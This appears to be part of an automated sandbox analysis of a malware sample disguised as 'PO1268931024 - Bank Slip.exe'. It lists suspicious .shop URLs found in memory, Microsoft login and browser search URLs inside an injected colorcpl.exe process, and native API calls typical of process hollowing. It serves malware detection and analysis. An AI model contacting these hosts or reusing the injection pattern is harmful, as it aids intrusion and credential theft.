                Source: PO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: PO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                Source: PO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: eiVHpMoiongmS.exe, 00000004.00000002.4162936515.0000000006C50000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.timizoasisey.shop
                Source: eiVHpMoiongmS.exe, 00000004.00000002.4162936515.0000000006C50000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.timizoasisey.shop/3p0l/
                Source: PO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                Source: PO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                Source: PO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: PO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: colorcpl.exe, 00000007.00000003.2169231678.0000000008468000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: colorcpl.exe, 00000007.00000003.2169231678.0000000008468000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: colorcpl.exe, 00000007.00000003.2169231678.0000000008468000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: colorcpl.exe, 00000007.00000003.2169231678.0000000008468000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: colorcpl.exe, 00000007.00000003.2169231678.0000000008468000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: colorcpl.exe, 00000007.00000003.2169231678.0000000008468000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: colorcpl.exe, 00000007.00000003.2169231678.0000000008468000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: colorcpl.exe, 00000007.00000002.4157400312.00000000035B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: colorcpl.exe, 00000007.00000002.4157400312.000000000359B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: colorcpl.exe, 00000007.00000002.4157400312.00000000035B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2LMEM
                Source: colorcpl.exe, 00000007.00000002.4157400312.00000000035B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: colorcpl.exe, 00000007.00000002.4157400312.00000000035B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
                Source: colorcpl.exe, 00000007.00000002.4157400312.00000000035B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: colorcpl.exe, 00000007.00000002.4157400312.00000000035B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: colorcpl.exe, 00000007.00000002.4157400312.00000000035B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: colorcpl.exe, 00000007.00000003.2155261763.000000000845C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: colorcpl.exe, 00000007.00000003.2169231678.0000000008468000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: eiVHpMoiongmS.exe, 00000004.00000002.4160981089.00000000057E4000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 00000007.00000002.4158584230.0000000006904000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: colorcpl.exe, 00000007.00000003.2169231678.0000000008468000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: eiVHpMoiongmS.exe, 00000004.00000002.4160981089.0000000004E78000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 00000007.00000002.4158584230.0000000005F98000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.jexiz.shop/li8d/?qp=qTZ8t28&_XPD90E=sm
                Source: eiVHpMoiongmS.exe, 00000004.00000002.4160981089.0000000004E78000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 00000007.00000002.4158584230.0000000005F98000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.jexiz.shop/li8d/?qp=qTZ8t28&amp;_XPD90E=sm
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0042C433 NtClose,2_2_0042C433
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0040A9E3 NtAllocateVirtualMemory,2_2_0040A9E3
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017D2B60 NtClose,LdrInitializeThunk,2_2_017D2B60
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017D2DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_017D2DF0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017D2C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_017D2C70
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017D35C0 NtCreateMutant,LdrInitializeThunk,2_2_017D35C0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017D4340 NtSetContextThread,2_2_017D4340
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017D4650 NtSuspendThread,2_2_017D4650
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017D2BF0 NtAllocateVirtualMemory,2_2_017D2BF0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017D2BE0 NtQueryValueKey,2_2_017D2BE0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017D2BA0 NtEnumerateValueKey,2_2_017D2BA0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017D2B80 NtQueryInformationFile,2_2_017D2B80
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017D2AF0 NtWriteFile,2_2_017D2AF0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017D2AD0 NtReadFile,2_2_017D2AD0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017D2AB0 NtWaitForSingleObject,2_2_017D2AB0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017D2D30 NtUnmapViewOfSection,2_2_017D2D30
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017D2D10 NtMapViewOfSection,2_2_017D2D10
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017D2D00 NtSetInformationFile,2_2_017D2D00
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017D2DD0 NtDelayExecution,2_2_017D2DD0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017D2DB0 NtEnumerateKey,2_2_017D2DB0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017D2C60 NtCreateKey,2_2_017D2C60
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017D2C00 NtQueryInformationProcess,2_2_017D2C00
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017D2CF0 NtOpenProcess,2_2_017D2CF0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017D2CC0 NtQueryVirtualMemory,2_2_017D2CC0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017D2CA0 NtQueryInformationToken,2_2_017D2CA0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017D2F60 NtCreateProcessEx,2_2_017D2F60
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017D2F30 NtCreateSection,2_2_017D2F30
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017D2FE0 NtCreateFile,2_2_017D2FE0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017D2FB0 NtResumeThread,2_2_017D2FB0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017D2FA0 NtQuerySection,2_2_017D2FA0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017D2F90 NtProtectVirtualMemory,2_2_017D2F90
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017D2E30 NtWriteVirtualMemory,2_2_017D2E30
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017D2EE0 NtQueueApcThread,2_2_017D2EE0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017D2EA0 NtAdjustPrivilegesToken,2_2_017D2EA0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017D2E80 NtReadVirtualMemory,2_2_017D2E80
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017D3010 NtOpenDirectoryObject,2_2_017D3010
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017D3090 NtSetValueKey,2_2_017D3090
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017D39B0 NtGetContextThread,2_2_017D39B0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017D3D70 NtOpenThread,2_2_017D3D70
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017D3D10 NtOpenProcessToken,2_2_017D3D10
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05294650 NtSuspendThread,LdrInitializeThunk,7_2_05294650
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05294340 NtSetContextThread,LdrInitializeThunk,7_2_05294340
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05292D30 NtUnmapViewOfSection,LdrInitializeThunk,7_2_05292D30
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05292D10 NtMapViewOfSection,LdrInitializeThunk,7_2_05292D10
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05292DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_05292DF0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05292DD0 NtDelayExecution,LdrInitializeThunk,7_2_05292DD0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05292C60 NtCreateKey,LdrInitializeThunk,7_2_05292C60
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05292C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_05292C70
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05292CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_05292CA0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05292F30 NtCreateSection,LdrInitializeThunk,7_2_05292F30
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05292FB0 NtResumeThread,LdrInitializeThunk,7_2_05292FB0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05292FE0 NtCreateFile,LdrInitializeThunk,7_2_05292FE0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05292E80 NtReadVirtualMemory,LdrInitializeThunk,7_2_05292E80
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05292EE0 NtQueueApcThread,LdrInitializeThunk,7_2_05292EE0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05292B60 NtClose,LdrInitializeThunk,7_2_05292B60
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05292BA0 NtEnumerateValueKey,LdrInitializeThunk,7_2_05292BA0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05292BE0 NtQueryValueKey,LdrInitializeThunk,7_2_05292BE0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05292BF0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_05292BF0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05292AF0 NtWriteFile,LdrInitializeThunk,7_2_05292AF0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05292AD0 NtReadFile,LdrInitializeThunk,7_2_05292AD0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_052935C0 NtCreateMutant,LdrInitializeThunk,7_2_052935C0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_052939B0 NtGetContextThread,LdrInitializeThunk,7_2_052939B0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05292D00 NtSetInformationFile,7_2_05292D00
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05292DB0 NtEnumerateKey,7_2_05292DB0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05292C00 NtQueryInformationProcess,7_2_05292C00
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05292CF0 NtOpenProcess,7_2_05292CF0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05292CC0 NtQueryVirtualMemory,7_2_05292CC0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05292F60 NtCreateProcessEx,7_2_05292F60
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05292FA0 NtQuerySection,7_2_05292FA0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05292F90 NtProtectVirtualMemory,7_2_05292F90
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05292E30 NtWriteVirtualMemory,7_2_05292E30
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05292EA0 NtAdjustPrivilegesToken,7_2_05292EA0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05292B80 NtQueryInformationFile,7_2_05292B80
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05292AB0 NtWaitForSingleObject,7_2_05292AB0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05293010 NtOpenDirectoryObject,7_2_05293010
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05293090 NtSetValueKey,7_2_05293090
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05293D10 NtOpenProcessToken,7_2_05293D10
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05293D70 NtOpenThread,7_2_05293D70
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_03228EC0 NtCreateFile,7_2_03228EC0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_03229320 NtAllocateVirtualMemory,7_2_03229320
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_03229120 NtDeleteFile,7_2_03229120
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_032291C0 NtClose,7_2_032291C0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_03229030 NtReadFile,7_2_03229030
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 0_2_02F7D3240_2_02F7D324
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 0_2_076600400_2_07660040
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 0_2_0766C7200_2_0766C720
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 0_2_0766C7300_2_0766C730
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 0_2_0766E6480_2_0766E648
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 0_2_0766E6380_2_0766E638
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 0_2_0766E2100_2_0766E210
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 0_2_0766C2F80_2_0766C2F8
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 0_2_0766C2CA0_2_0766C2CA
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 0_2_0766E1FF0_2_0766E1FF
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 0_2_076600060_2_07660006
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 0_2_0766CB680_2_0766CB68
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 0_2_07664B480_2_07664B48
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 0_2_0766CB580_2_0766CB58
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 0_2_0766396F0_2_0766396F
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 0_2_076639800_2_07663980
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 0_2_07B32B6C0_2_07B32B6C
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_004183D32_2_004183D3
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_004011102_2_00401110
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0040E13B2_2_0040E13B
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0042EAD32_2_0042EAD3
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_004023702_2_00402370
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0040FCC32_2_0040FCC3
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_004166132_2_00416613
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0040FEE32_2_0040FEE3
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0040DF632_2_0040DF63
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_004027102_2_00402710
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_00402FD02_2_00402FD0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_018541A22_2_018541A2
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_018601AA2_2_018601AA
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_018581CC2_2_018581CC
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017901002_2_01790100
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0183A1182_2_0183A118
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_018281582_2_01828158
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_018320002_2_01832000
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_018603E62_2_018603E6
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017AE3F02_2_017AE3F0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0185A3522_2_0185A352
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_018202C02_2_018202C0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_018402742_2_01840274
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_018605912_2_01860591
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A05352_2_017A0535
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0184E4F62_2_0184E4F6
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_018444202_2_01844420
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_018524462_2_01852446
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A07702_2_017A0770
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017C47502_2_017C4750
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0179C7C02_2_0179C7C0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017BC6E02_2_017BC6E0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017B69622_2_017B6962
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0186A9A62_2_0186A9A6
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A29A02_2_017A29A0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A28402_2_017A2840
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017AA8402_2_017AA840
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017CE8F02_2_017CE8F0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017868B82_2_017868B8
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01856BD72_2_01856BD7
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0185AB402_2_0185AB40
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0179EA802_2_0179EA80
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017AAD002_2_017AAD00
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0179ADE02_2_0179ADE0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0183CD1F2_2_0183CD1F
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017B8DBF2_2_017B8DBF
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01840CB52_2_01840CB5
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A0C002_2_017A0C00
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01790CF22_2_01790CF2
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0181EFA02_2_0181EFA0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017C0F302_2_017C0F30
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017E2F282_2_017E2F28
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01792FC82_2_01792FC8
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01842F302_2_01842F30
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01814F402_2_01814F40
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0185CE932_2_0185CE93
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A0E592_2_017A0E59
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0185EEDB2_2_0185EEDB
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0185EE262_2_0185EE26
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017B2E902_2_017B2E90
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0178F1722_2_0178F172
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017D516C2_2_017D516C
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017AB1B02_2_017AB1B0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0186B16B2_2_0186B16B
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0184F0CC2_2_0184F0CC
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0185F0E02_2_0185F0E0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_018570E92_2_018570E9
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A70C02_2_017A70C0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0178D34C2_2_0178D34C
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0185132D2_2_0185132D
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017E739A2_2_017E739A
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_018412ED2_2_018412ED
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017BD2F02_2_017BD2F0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017BB2C02_2_017BB2C0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A52A02_2_017A52A0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0183D5B02_2_0183D5B0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_018695C32_2_018695C3
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_018575712_2_01857571
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017914602_2_01791460
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0185F43F2_2_0185F43F
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0185F7B02_2_0185F7B0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_018516CC2_2_018516CC
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017E56302_2_017E5630
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A99502_2_017A9950
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017BB9502_2_017BB950
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_018359102_2_01835910
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0180D8002_2_0180D800
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A38E02_2_017A38E0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01815BF02_2_01815BF0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017DDBF92_2_017DDBF9
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0185FB762_2_0185FB76
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017BFB802_2_017BFB80
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01841AA32_2_01841AA3
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0183DAAC2_2_0183DAAC
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0184DAC62_2_0184DAC6
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01857A462_2_01857A46
